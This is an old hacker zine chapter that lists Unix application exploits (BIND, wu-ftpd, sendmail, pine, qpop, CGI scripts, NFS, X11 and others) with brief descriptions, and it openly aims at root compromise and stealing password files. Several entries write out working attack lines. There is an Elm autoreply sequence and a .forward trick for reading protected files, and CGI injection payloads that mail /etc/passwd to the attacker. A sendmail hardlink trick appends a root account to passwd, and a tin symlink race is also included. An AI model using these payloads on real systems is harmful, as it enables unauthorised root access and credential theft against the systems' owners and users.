O.k, welps.... this is an extension of chapter 13 (irc_hacking.faq), I'm going to have to split it up into different parts, so you won't get all the info in Happle 10, or Happle 11, it will probably be an on-going thing since there is so much to cover. The only thing that I'm going to be covering in these txt's is root compromises, core dumps and passwd files, nothing in DoS attacks or anything that crashes the server. I will list the exploits under categories and give a brief description of each one ie. local or remote exploit.
I'm going to start with applications since the exploits are against all servers that run the application (unless specified), and yes i probably will not cover *everything*, but it'll be a fair bit ;). Also what code i do talk about (ie.wh0a.c) will be included in the Happle issue, so you don't have to go looking for it, ain't i nice :P
BIND
~~~~
bind-CA98.05: Gives an explanation on how to obtain root access on a nameserver running BIND 4.9 and BIND 8 Releases.
bindExploit.txt: Bind is exploitable in a way that you can use netcat to obtain packet information from incoming udp/tcp connections.
CHAT
~~~~
ichat3.txt: Ichat 3.0 servers are vulnerable to an attack that lets anyone view any file on the system (eg http://chat.server.com:4080/../../../etc/passwd).
SDI-bnc.c: Code to an exploit that obtains root on the server running bnc 2.2.4 (remote exploit).
vanity.c: Same as above except in this case it exploits all bnc versions less than or equal to 2.4.4.
COMPILE LANGUAGE
~~~~~~~~~~~~~~~~
Compile language, as in compile those great .c exploits to own the system from within ;).
gcc-exploit-2: gcc, for anyone who doesn't know, is a compiler that is widely used and lots of people forget to patch themselves. Anyways versions 2.7.2.x has a buffer overflow which in turn can give you root, this is a local attack, so you have to have a user on the server.
ENCRYPTION
~~~~~~~~~~
Mmm, don't want those ppl eavesdropping in on your session, ssh is a well used program to encrypt the input and output of data. Too bad for them that ssh can be owned ;)
ssh-1.2.26.txt: This explains how version 1.2.26 oh secure shell is exploitable, so i don't really have to go through explaining it, if you wunna know about it, read it :P
sshkerb.txt: Explains how to exploit ssh-1.2.26 kerberos code, it is reasonably hard to do, but if you want to own the server.....
FINGER
~~~~~~
Well, we all know what finger is.
cfingerd.html: Exploit against cfingerd version 1.0.1, this is a local exploit and very easy to do, lets normal users perform arbitrary commands as root.
fingerd1.html: An exploit in systems running GNU in.fingerd(8) 1.37 which gives normal user root access, this is not a buffer overflow, it's just showing how crappy finger is. This is a local exploit.
FTP
~~~
File transfer protocol, a well used protocol to get one file from one computer to another via the internet.
FTPBUG.C: A bug in wu-ftp 2.x is exploitable from local host allowing user to have a suid root shell.
ftpd.txt: An explanation on remote buffer overflows in various FTP servers that may lead to potential root compromise.
Versions:
wu-ftp 2.4.2 beta 18 and VR versions ≤ 10
Pro-ftpd 1.2.0pre1 and prior
BeroFTPD prior to 1.2.0
Also explains which OS's are vulnerable, ie. SunOS is not vulnerable
ftpd1.html: Remote users can upload .rhost and therefore gain access to the server.
ftpd7.html: Core dump in systems running ftp versions 2.2 and 3.0, ftpd was patched but not completely, remote and local exploit.
ftpd8.html: Just says what OS's are vuln to ftpd attack, but does not give the exploit code, stupid whores ;).
ncftp: Explains how to exploit ncftp 2.4.2 remotely, and you get .rhosts from the attack.
SDI-wu.c: Exploit code for wu-ftp 2.4.2 beta 18 are prior, this is a remote attack which gains root access.
security.dynamics.ftp.html: Security dynamics' FTP server (Version 2.2) can be exploited to give core dump (local access needed), this explains how.
wh0a.c: Code for the remote exploit against wu-ftp v2.4.2-beta18, which in turn gains root access, this is differently coded to SDI-wu.c, so if your crappy and can't compile SDI-wu.c try this one ;)
wu-ftp.sh: Attack against wu-ftp which lets you create a file anywhere in the system, you get core dump aswell (local).
WUFTP.TXT: Exploit against wuftp2.4(1) which can lead to suid root shell.
wuftpd-sdump.sh: You can view and assemble shadow passwd file, core dump. Remote exploit (if anonymous ftp).
wuftpd-sploit.tar.gz: Yet another wu-ftp exploit
wuftpd_umask.txt: Exploit in wu-ftpd 2.4.2-beta-13 causing core dump (666), local or remote attack.
w00f.c: Wu-ftp exploits everywhere, here's another buffer overflow remote/local exploit against wu-ftpd [12] to [18].
ftpd.locate.findutils.txt: Explains a problem with locate from findutils-4.1.24.rpm for Redhat-5.1 and 6.0 (possibly), yeah it segfaults and can be used for running arbitrary commands if root runs locate.
MAIL
~~~~
Mail mail mail, e-mail for j00. Used basically on every ISP, so it's worth while to check if you (or your ISP, and your friends ISP and that other ISP, and um anyone's computer. Just trying to be an upstanding citizen) are vulnerable to any remote or local exploits.
arpl1.html: Simple exploit against all (?) versions of The Elm Mail System (remote or local). All it basically does is send the passwd file to your home dir ie:
$ cd $HOME
$ echoh x > passwd
$ export HOME=/.secure/etc
$ autoreply passwd
$ mail geiri < /dev/null
and it's in your IN box. Something to do with how suid handles the / in a filename.
autoreply.txt: Code in shell to exploit version of The Elm Mail System's autoreply(1), which can be used to make root owned file, with mode 666. This txt shows "how to become root on most affected machines by modifying root's .rhosts file.".
explpine.c: Code on a local root exploit against Pine 4.xx, this is (of course) a buffer overflow exploit and you are needed to have user on the server that is being exploited (local exploit).
foward.txt: I didn't include this exploit because it's so small i can stick it here ;) :
"
# a stupid bug, but it works
echo ":include:/unreadable/file" > .forward
mail that account from another account
and then go looking through the /var/syslog/messages
you will see lines from the unreadable file.
"
imap4r1-linux.sh: Imap remote root exploit, only tested on version IMAP4rev1v10.203.
imapd4.txt: All about the exploit against imap4, if you wunna know so much about it, go read it :P
imap_core.txt: Exploit against the imapd and ipop3d (if you installed pine with 3.4) that come with slackware 3.4 (also 3.3 is exploitable for the imap daemon), this is basically a core dump.
imapx.c: A imap exploiter's best friend, exploits imap4 (x) all versions that are vulnerable. Remote exploit.
impack103.tar.gz: Imap pack with exploits against imap and imap2, also has imap subnet scanner and some other shit.
ipop3d.4.xx.bof.txt: This is a remote exploit against ipop3d 4.xx. Buff0r overflow, as it says in the txt: "The exploited overflow in ipop3d could be used to gain superuser access (the only thing done by ipop3d is setuid+setgid, no seteuid/setreuid)."
mailrc.txt: Goes through the process of exploiting pine 3.96 on RedHat 5.0, the best you can do is be able to execute arbitrary via e-mail.
mailxploit.tar.gz: Exploit pack against mailx (by Berkly Systems) which lets users get any information available to the 'mail', can be used (potentially) to gain root access.
majord3.html: Systems running majordomo are exploitable. Any user (local or remote) can execute commands as any user on that system, not bad ;)
pine7.html: Explains about the pine 3.96 exploit, can be used locally or remotely to gain root access.
pine_exploit.sh: Shell coded vulnerability against the pine bug exploit in version 3.91 and 3.92, can be used remotely too gain root access.
pop3.c: Remote brute force hack against pop3 mail prog. Pop3 allows multiple connections and pop3 does not log bad passwd and/or bad user access.
procmail.html: /etc/passwd is nice. The exploitable procmail version v3.11pre4 lets you gain access to any file on the system, all you have too do is request it in the mail Subject.
qpop.c: Qpop exploit.... Buffer overflow in versions: 2.2, 2.2beta1, 2.4... For more info see my other file on qpoping (Happle 9). Remote exploit that lets any user gain root.
qpop242.c: Exploit against BSD's qpop 2.4beta2, BSD's qpop also has vulnerable versions 2.3 and 2.5.
qpopper-netcat.c: Exploit against qpop 2.4 using NC (netcat), remote buffer overflow exploit .
qpopper.c: Yeah, another exploit against qpop versions 2.2 and 2.4 {other variations possible, like i said read "qpoping for whores" (happle 9) if you wunna know more}
scopop-root.c: SCO POP remote root exploit. Buffer overflow. Version 2.1.4-R3 vulnerable.
5_5_5_1_-sendmail.txt: Yay, sendmail bugs. This txt explains how you can grab files from the server ie. passwd file, shadow file.... by exploiting good ol' sendmail remotely.
5_6_1-sendmail.txt: With sendmail 5.61 you can basically become any user on the shell (except root) by using the code included, if you have any brains you'll use it to get super user access and go from there.
8_6_5_1_-sendmail.txt: Rootable version of sendmail, code included (local).
8_6_9_3_-sendmail.txt: Yeah, this version is also vulnerable.... Exploit uses ident on the sendmail host to gain passwd file. Code included.
8_7_x_and_8_8_2_1_-sendmail.txt: Code that creates root shell on host specified that runs sendmail version/s 8.7.x and 8.8.2
8_8_0_2_-sendmail.txt: This version of sendmail lets users to execute arbitrary commands as root via sending you mail to your machine.
8_x_3_-sendmail.txt: Exploits sendmail(8) on SunOS creating suid root shell, code included and this is a remote exploit ;)
sendmail.8.8.4.hardlink.dead.le: On small boxes, if you can make a hard link of /etc/passwd to /var/tmp/dead.letter then telnet to port 25 of the specified host, send some mail with a bad e-mail addy and a unreachable host. Once this is done your message will get appended to passwd ie. unfy::0:0:gh12f27cs Eh h:/:/bin/sh
sendmail_875_advisory: Buffer overflow in sendmail 8.7.5, any local user can gain root access. Code included.
sendmail_buglist.txt: A very large list of what platforms are vulnerable to what sendmail bugs, nice to see if you are exploitable or not ;)
NEWS
~~~~
innd4.html: Explains how systems running INN versions 1.5.1 and earlier are vulnerable to remote attack that allows "non-authorized" users to execute arbitrary commands.
innd5.html: Exploit for systems running INN versions 1.6 and earlier ;) This also allows remote users to execute arbitrary commands.
tin_problem.txt: Small txt, so i'll just paste it here:
"
When a user runs rtin/tin a user-list will be created in /tmp/.tin_log
with mode 0666. and if a user makes a symlink from /etc/passwd (or any
file) to /tmp/.tin_log and root or another user with uid 0 runs rtin/tin,
tin will follow the symlink to /etc/passwd and change the mode to 0666.
I hope no admin's are stupid enough to run rtin/tin as uid 0. :-)
"
inn.2.x.inndstart.txt: An explanation of what INN versions are vulnerable to a particular exploit, that in turns gives root privileges. This does not give the code to exploit INN 2.x.
NIS
~~~
yp.txt: Basic exploit... Systems running Passwd+ or NPasswd and possibly other similar programs have a problem when the passwd expires (a way to force a user to change their passwd), when the users logs in it asks them to change their passwd without asking them to enter OLD passwd first, so you can just change their passwd to whatever you want.
ypbreak.c: A remote exploit that changes a users passwd via the yppasswd daemon.
RPC
~~~
portmap4.html: A bug in portmap(8) let NFS user read and write root owned files, this only effects SunOS 4.1.x and IRIX.
portmap5.html: NFS users can trick portmap into letting them access other users files, you can use this to gain root access.
rpc.mountd_bug.txt: Just explains that you can use mount to find out what files the system is using ie.sperl and use that to know what the system is vulnerable to.
wallflash.c: Some code that tries to connect to a host and exploits wall rpc file to get access to any file on the system. Remote exploit.
X-WIN
~~~~~
312.txt: All systems with XFree86 3.1.2 installed are vulnerable to an exploit that lets users to read 'limited' portions of any file on the system. Local exploit.
kppp.txt: The kppp application that comes with KDE env is vulnerable to a buffer overflow that gives local user root shell.
xdm.html: Unix ware sets /usr/X/bin/xdm as setuid, so you can gain access to any file/duplicate the file into your dir using xdm.
xdmpasswd: Exploits xdm to overwrite files that use temp. files, you could use this with a sendmail vulnerability (linking dead.letter to /etc/passwd).
xdm_problem.txt: Xdm and CDE are vulnerable to a brute force attack ussing SSH and rlogin by bypassing host.deny and letting root access remotely where it is usually only set for console.
xfree86.txt: XFree86 3.3.1 (current), 3.2.9 and 3.1.2 are vulnerable to exploitation. Basically it lets any user have read permission anywhere on the system ie. /etc/passwd.
xit.c: Brute force hacks passwd file on the system.
XKB.insecurity.html: X11R6.3-based Xserver with XKEYBOARD extension is set as setuid so any local user can exploit a feature in XKB implementation to execute arbitrary commands.
Xserver.display.overflow.html: Buffer overflow can be executed to get root shell on systems running as X11R6-based Xserver (as setuid or setgid). Local Exploit.
xterm_exp.c: Buffer overflow against Xaw and neXtaw widgets gaining root access. Local exploit.
xview.html: Another Buffer overflow, this one is against the xview lib.
CGI
~~~
brute_ssl.c: Basically a brute force hacker that guesses it's way through user and id prompts on a Web Server.
brute_web.c: Another brute force hacker. This one also tries to guess passwds to a user.
netscape-ex.txt: Any server running X-windows and netscape at the same time can be exploited to gain user on that system.
nscape10.html: A javascript flaw in any Netscape Communicator site (4.x) can be exploited to gain user and pass.
nscape12.html: Systems running Netscape Enterprise Server 3.0 have a Javascript flaw which lets anyone gain user a pass by downloading the application to there browser, the stupid thing is that the user and pass is unencrypted ;)
nscape4.html: Any OS running Netscape 2.x, 3.x and 4.0 can be force to transfer any "known" file to a remote exploiter (via Javascript).
cgi_phf1.txt: Good ol' PHF. An exploit in PHF lets anyone access any file on the system (eg. /etc/passwd), or even get a directory listing.
excite.txt: Security hole in EWS lets any user on the system send a mail to themselves to get any file on the system. (eg. ";IFS="$";/bin/cat /etc/passwd|mail your_email_here;)
glimpse_http.txt: GlimpseHTTP has a hole in it that lets a remote attacker execute any command as the owner of that system.
htmlscript.txt: Htmlscript is vulnerable to remote executable commands, so anyone can have access to /etc/passwd or any other file on that system.
httpd50.html: Systems running Verity/Search'97 are exploitable. The exploit lets any remote user execute commands to view any file on that system.
info2www: Local users can have access to any file on the system by just asking it in the subject of a redirecting mail. (eg. REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)' )
jscript.html: Explains that Javascript can be exploited to view any file on the vulnerable system through your browser, or even d/l it.
nscape5.html: Systems NS Communicator and connecting via squid proxy have an exploit that lets anyone view any file on the system.
phf.5: Code to exploit systems running PHF.
php.txt: PHP is also vulnerable to an attack that lets anyone execute commands to the server, this way you can gain access to /etx/passwd.
test-cgi.txt: Any system running test-cgi may be vulnerable. This vulnerability allows a remote user to gain access to the files on that system.
textcounter: Systems running textcounter can be exploited to let the attacker execute commands as the http daemon.
valueclick-cgi.txt: ValueClick has a CGI vulnerability that lets a remote user capture user/passwd file/s.
view_source.txt: Simple exploit that allows anyone to view /etc/passwd or any other file on the system.
webgais.txt: Webgais HTTP/1.0 can be exploited by a local user to gain access to any file on the system, this is done by sending an e-mail to yourself (eg. query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph)
webmin.txt: Webmin servers are vulnerable to brute force attacks to guess user/passwd.
wwwcount.c: As the file says "a buffer can be overflowed in the Count.cgi program, allowing remote http users to execute arbitrary commands on the target machine."
wwwthreads.txt: The WWW Threads discussion forum software lets any remote attacker gain access to the data directory that contains user and passwds.
NFS
~~~
nfs1.html: Explains how an NFS client can gain access to any file on the system because of a flaw in the NFS system.
nfs2.html: An explanation upon NFS clients being able to edit/replace any file on the system eg. .rhosts .
nfsbug.c: A search, or a brute force search :P that tries to guess the file handle of the root user.
nfsd1.html: All NFS systems are supposedly vulnerable to an attack that allows any user to basically do whatever the fuck they want.
nfsd4.html: A reasonably basic exploit. NFS systems get a bit confused when you set 32-bit UID and have the lower order of numbers (to the right) set to zero. Since NFS uses 16-bit UID, the user can read/write any file owned by root.
nfsshell.c: An old remote exploit that tries to gain access to the NFS file system.
pcnfsd2.html: Explains how to exploits the printing on pcnfs to gain access to any file on the system as root.
REMOTE-LOGIN
~~~~~~~~~~~~
sunos.rlogin.overflow.html: Code to exploit systems running rlogin (root Compromise)
MISC
~~~~
lprm.overflow.html: Buffer overflow in lprm that allows local root compromise.
mc-kill.c: Security hole in Midnight Commander that makes core dump and also can reek havoc on the system.
mole.cfm: Any remote user can access/download any file on Cold Fusion application servers
oracle.8.0.5.intelligent.agent.: Exploit in oracle 8.0.5 that can be used to execute commands as root, or even if you have half a brain (as the document says) you are 3 commands away from becoming root.
pppd.html: Systems running pppd maybe vulnerable to exploitation that lets any user execute commands as root.
rsi-uucpd.txt: Local users on servers running BNU uucpd are able to exploit the server and get root compromise.
usr-totalswitch.txt: Systems running USR TotalSwitch can be exploited to make a memory dump which lets you view a nice little passwd to a user in plain text.
vixie.c: Code to exploiting crontab on various systems to make crontab execute arbitrary commands.
vixie2.html: An explanation to the above code.
workman_ex.txt: Exploit in workman that lets a local user to become root easily.
That's is all I'm going to do on "applications" on unix systems, i'll be going into other unix operating systems separately and show what those systems are vulnerable to, and maybe some other shit aswell. That's all from me.
